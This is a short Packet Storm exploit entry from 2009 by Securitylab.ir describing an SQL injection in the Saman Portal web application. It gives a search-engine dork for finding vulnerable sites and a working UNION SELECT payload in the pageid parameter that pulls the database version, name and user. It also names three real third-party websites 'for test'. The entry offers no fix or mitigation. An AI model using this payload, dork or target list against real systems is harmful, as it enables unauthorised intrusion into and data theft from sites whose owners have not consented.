Saman Portal SQL Injection

2009-05-24T00:00:00
ID PACKETSTORM:77776
Type packetstorm
Reporter Securitylab Security Research
Modified 2009-05-24T00:00:00

Description

                                        
                                            `######################### Securitylab.ir ########################  
# Application Info:  
# Name: Saman Portal  
# Version: All version  
# Website: http://www.sis-eg.com  
#################################################################  
# Discoverd By: Securitylab.ir  
# Website: http://securitylab.ir  
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir  
#################################################################  
# Vulnerability Info:  
# Type: Sql Injection  
# Risk: Medium  
# Dork: intext:www.sis-eg.com  
#===========================================================  
# hhttp://site.com/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,null,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,null,14,15,16,17--  
#===========================================================  
#################################################################  
# For test:  
# http://www.mccim.org  
# http://www.iaccim.com  
# http://www.yavari-soc.com  
##################################################################  
# Securitylab Security Research Team  
###################################################################  
  
  
`